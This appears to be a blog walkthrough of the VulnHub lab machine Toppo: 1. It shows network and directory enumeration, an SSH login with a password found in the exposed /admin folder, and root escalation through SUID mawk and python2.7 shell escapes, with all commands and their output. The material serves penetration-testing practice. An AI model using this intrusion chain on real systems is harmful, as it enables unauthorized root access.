Toppo: 1 || VulnHub Complete Walkthrough

In this article, we are going to tackle a vulnerable machine with a difficulty level easy, that we have downloaded from VulnHub.

Toppo: 1

Toppo: 1 is a vulnerable virtual machine available on Vulnhub, designed for penetration testing and cybersecurity learning purposes. It provides a hands-on opportunity to practice various penetration testing techniques and enhance your skills in identifying and exploiting vulnerabilities in a controlled environment. By exploring Toppo: 1, you can gain practical experience in security assessment and learn how to secure systems against common attacks.




Once you have downloaded it, you need to set up the server.


Settings Up

It is pretty easy, you can easily set up the server within VirtualBox. Follow the below steps to settings up the server.

1. Extract the zip file which has been downloaded from VulnHub. 

2. As this file is in the form of " .vmdk " format, we need to create a new virtual machine.

  • Name: Toppo
  • Type: Linux
  • Version: Other Linux (64-bit)

3. Click next and allocate RAM size for your Virtual Machine and click on Next. 

4. Now, select “Use an existing Virtual Hard disk file” and import the VMDK file that we have previously extracted.

5. Once you are done with these, click on settings and change the network adapter to the host-only adapter .

Make sure your Kali Linux Machine, from where you perform the attack, and Your Vulnerable machine, are in the same network.

Once you are done with the settings up, let’s start the Virtual Machines.

As you can notice, our Vulnerable Machine is ready, and we have got a login screen that prompts us to input the username and password.


Enumeration

Let's discover the IP address of the running server by using NetDiscover

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.180.0/16   |   Screen View: Unique Hosts                                                          
                                                                                                                               
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.162.1   0a:00:27:00:00:07      1      60  Unknown vendor                                                              
 192.168.162.2   08:00:27:3c:9f:81      1      60  PCS Systemtechnik GmbH                                                      
  192.168.162.4   08:00:27:7c:c8:14      2     120  PCS Systemtechnik GmbH                                                       

From the scanning, we have discovered our target IP address which is 192.168.162.4

Now, let's perform a network scan to detect what ports are open. 


Conducting Network Scans with Nmap

Scanning the Network is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. 

As in most cases, we are going to use the famous Nmap tool.

  • -sC: Used to perform a script scan using the default set of scripts,
  • -sV: Enables version detection, which will detect what versions are running on what port.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.162.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 05:48 EDT
Nmap scan report for 192.168.162.4
Host is up (0.00080s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Clean Blog - Start Bootstrap Theme
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42448/udp6  status
|   100024  1          45225/udp   status
|   100024  1          49713/tcp6  status
|_  100024  1          56828/tcp   status
MAC Address: 08:00:27:7C:C8:14 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.95 seconds  

From the Network scanning, we have spotted three open ports.

  • Port 22/TCP runs an SSH service, which means, that if you have a valid credential then it will be easy to gain login access to the server.
  • Port 80/TCP running an HTTP service, which indicates that there is some vulnerable website being hosted.
  • The last one is Port 111/TCP running an RPC bind service, which seems to be not useful in terms of gaining access to the server.


Web Application Enumeration and Directory Discovery with Gobuster

So let’s take a look at the web content running on Port 80. To look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

The running website might be created using Bootstrap. After analyzing, there is nothing to enumerate on the webpage. There might be any hidden or hardly accessible directories and pages, and that can be done through directory Busting.

Using gobuster as our tool of choice, we can use the following switches for the script to get the fastest, most accurate results.
  • dir: Used to specify the mode of enumeration, 
  • -u:  Used to specify the target URL, and 
  • -w: Used to specify the path of the wordlist.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.162.4/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.162.4/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/05 05:58:57 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 297]
/.htpasswd            (Status: 403) [Size: 297]
/admin                (Status: 301) [Size: 314] [--> http://192.168.162.4/admin/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.162.4/css/]  
/img                  (Status: 301) [Size: 312] [--> http://192.168.162.4/img/]  
/index.html           (Status: 200) [Size: 6437]                                 
/js                   (Status: 301) [Size: 311] [--> http://192.168.162.4/js/]   
/LICENSE              (Status: 200) [Size: 1093]                                 
/mail                 (Status: 301) [Size: 313] [--> http://192.168.162.4/mail/] 
/manual               (Status: 301) [Size: 315] [--> http://192.168.162.4/manual/]
/server-status        (Status: 403) [Size: 301]                                   
/vendor               (Status: 301) [Size: 315] [--> http://192.168.162.4/vendor/]
                                                                                  
===============================================================
2022/09/05 05:59:03 Finished
===============================================================

As a result of Directory busting, we obtained an admin page. Let’s dig into this directory and find out if there is any sensitive information that might help us in foothold. Let’s have a look.


Foothold

From the Admin Page, we obtain a Text file that contains a Password. 

Let’s try to attempt login to gain access to the server with the help of the SSH client tool. 


Establishing SSH Connection

To gain an SSH connection, we might have a username and password. From the note, we have obtained a password. If you have looked at it carefully, then you have noticed a username is also mentioned within the Password.

Let’s have a look. Open a terminal and run the following command:

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password: 12345ted123

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep  5 06:04:07 2022 from 192.168.162.5
ted@Toppo:~$

As you can notice, we got login successfully, now move to post-exploitation and try to get root access.


Privilege Escalation

The next step is escalating to the root user in order to gain the highest privileges on the system. Let’s run “ uname -a ” to display the system the information that seems to be not vulnerable to this Debian version.

ted@Toppo:~$ uname -a
Linux Toppo 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
ted@Toppo:~$

Now, run the following command, to enumerate all binaries, having SUID permissions.

SUID or Set Owner User ID is special file permission for executable files, which enables other users to run the file with the effective permissions of the file owner.
ted@Toppo:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount
ted@Toppo:~$

As you can see, this command dumped all system binaries which having SUID permissions. (Marked in Green)


SUID Binary Privilege Escalation

In order to gain root access, I have two methods.


Method 1: Using MAWK

MAWK is an interpreter for the AWK Programming Language. The AWK language is useful for manipulating data files, text retrieval and processing, and prototyping and experimenting with algorithms.

By running the following command with mawk to get the root shell. You can find the root flag from the root directory to complete the challenge.

ted@Toppo:~$ mawk 'BEGIN {system("/bin/sh")}'
# cat /root/flag.txt                                                                                                         
_________                                                                                                                    
|  _   _  |                                                                                                                  
|_/ | | \_|.--.   _ .--.   _ .--.    .--.                                                                                    
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \                                                                                  
   _| |_ | \__. | | \__/ | | \__/ || \__. |                                                                                  
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'                                                                                   
                 [__|     [__|                                                                                               
                                                                                                                             
                                                                                                                             
                                                                                                                             
                                                                                                                             
Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}                                                  
                                                                                                                             
                                                                                                                             


Method 2: Using “Python 2.7”

You just need to run these interactive shell commands to obtain the root shell.

ted@Toppo:~$ python2.7 -c "import pty;pty.spawn('/bin/sh')"
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
_________                                  
|  _   _  |                                 
|_/ | | \_|.--.   _ .--.   _ .--.    .--.   
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
   _| |_ | \__. | | \__/ | | \__/ || \__. | 
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'  
                 [__|     [__|              




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}



In this way, you can hack these types of vulnerable machines to gain access. Now, we have successfully captured the root flag. Now the challenge is completed.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!